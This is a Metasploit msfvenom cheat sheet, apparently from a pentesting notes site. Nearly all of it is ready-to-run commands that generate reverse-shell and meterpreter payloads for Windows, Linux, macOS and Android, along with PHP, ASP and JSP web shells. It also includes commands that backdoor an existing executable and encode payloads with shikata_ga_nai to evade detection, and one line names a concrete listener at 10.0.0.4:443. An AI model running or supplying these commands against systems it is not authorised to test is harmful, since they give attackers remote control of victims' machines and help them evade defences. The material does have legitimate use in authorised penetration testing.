msfvenom#

MsfVenom is the Metasploit standalone payload generator. It replaces msfpayload and msfencode.

Binaries#

# Windows
$ msfvenom -p windows/meterpreter/reverse_tcp  LHOST={IP} LPORT={##} -f exe -o example.exe
$ msfvenom -p windows/meterpreter/reverse_http LHOST={IP} LPORT={##} -f exe -o example.exe

# Linux
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={IP} LPORT={##} -f elf -o example.elf

# macOS
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST={IP} LPORT={##} -f macho -o example.macho

# Android
$ msfvenom -p android/meterpreter/reverse_tcp LHOST={IP} LPORT={##} R -o example.apk

Web payloads#

$ msfvenom -p php/meterpreter_reverse_tcp LHOST={IP} LPORT={##} -f raw -o example.php
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} -f asp -o example.asp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST={IP} LPORT={##} -f raw -o example.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST={IP} LPORT={##} -f war -o example.war

Windows payloads#

$ msfvenom -l encoders                                # list encoders

# bind exe with payload (backdoor an exe)
$ msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} \
    -f exe -o example.exe

# encoded payload, shikata_ga_nai, 3 iterations, bad byte \x00
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} \
    -e x86/shikata_ga_nai -b '\x00' -i 3 -f exe -o example.exe

# combine bind + encode
$ msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={IP} LPORT={##} \
    -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o example.exe

macOS payloads#

$ msfvenom -a x86 --platform OSX -p osx/x86/isight/bind_tcp -b "\x00" -f elf -o /tmp/osxt2
$ msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.0.4 LPORT=443 -o pyterpreter.py
$ msfvenom -p osx/x86/shell_reverse_tcp LHOST={IP} LPORT={##} -f macho -o example.macho

References#